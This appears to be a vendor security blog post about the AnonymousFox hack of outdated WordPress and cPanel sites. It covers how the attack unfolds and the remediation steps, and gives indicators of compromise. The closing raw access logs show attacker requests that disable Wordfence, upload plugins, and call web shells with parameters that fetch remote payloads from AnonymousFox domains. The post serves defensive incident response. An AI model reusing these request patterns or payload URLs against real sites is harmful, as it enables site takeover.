The AnonymousFox hack will exploit outdated WordPress sites, later infecting core files, web files, and databases. The attacker will gain full cPanel access, so the process of reverting it is laborious.
I will describe how AnonymousFox develops, some key indicators, and the main steps in fighting it.
How this attack develops:
1. Using malicious scripts injected via WordPress, the following files are modified:
/home/user/.cpanel/contactinfo and /home/user/.contactemail
2. cPanel password is changed, using a newly created email [email protected].
Alternatively, secondary email accounts are created like [email protected].
3. WordPress users with administrator privileges are created.
Examples: “guest”, “AnonymousFox_” usernames.
4. Malicious WordPress plugins are added, which are used to manage files
Need help? Let us clean your site.
How to address the AnonymousFox hack?
- Perform a backup that will include the database, emails, and web files.
- Download a backup copy on your local computer, to secure the latest working site version.
- If the backup step is taking longer than few hours, move to Step 2.
- Disable all active sites. All the public files should be moved to a private folder.
- If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
- Check for newly created subdomains.
- Go to cPanel > Contact Information and change primary and secondary email.
- Remove all FTP accounts under FTP Accounts.
- Remove all suspicious email accounts under Email Accounts.
- Review the Cronjobs.
- If malicious files are automatically created, after deleting the Cron jobs, review PHP processes.
- Move all files under /home/user/public_html/ to a safe area.
- If you have addon sites or subdomains, you should each to safe area, outside public access.
- Clean your WordPress site. A recent guide available here: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”
Anonymous Fox has an official website, where members describe the current tools used for the attacks.
Need help? Try our Free security analysis.
Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU
Domains: anonymousfox[.]is (220.127.116.11), anonymousfox[.]mx (18.104.22.168)
22.214.171.124 – – [02/Apr/2021:07:01:10 +1100] “POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200
126.96.36.199 – – [02/Apr/2021:01:16:58 +1100] “GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200 3703 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0”
[06/Mar/2021:06:16:50 +1100] “GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1” 403 1167 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:06:16:58 +1100] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.1” 200
[06/Mar/2021:06:17:05 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/1.1” 200
[06/Mar/2021:23:27:12 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/2” 200
[06/Mar/2021:23:27:15 +1100] “GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 100 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:23:27:18 +1100] “POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 157 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[29/Mar/2021:02:26:41 +1100] “GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1” 200 3570 “https://example.com/wp-content/plugins/erwvxqtoto/up.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36”
188.8.131.52 – – [08/Dec/2021:19:57:48 +0100] “POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1” 200
184.108.40.206 – – [08/Dec/2021:19:57:34 +0100] “POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1” 200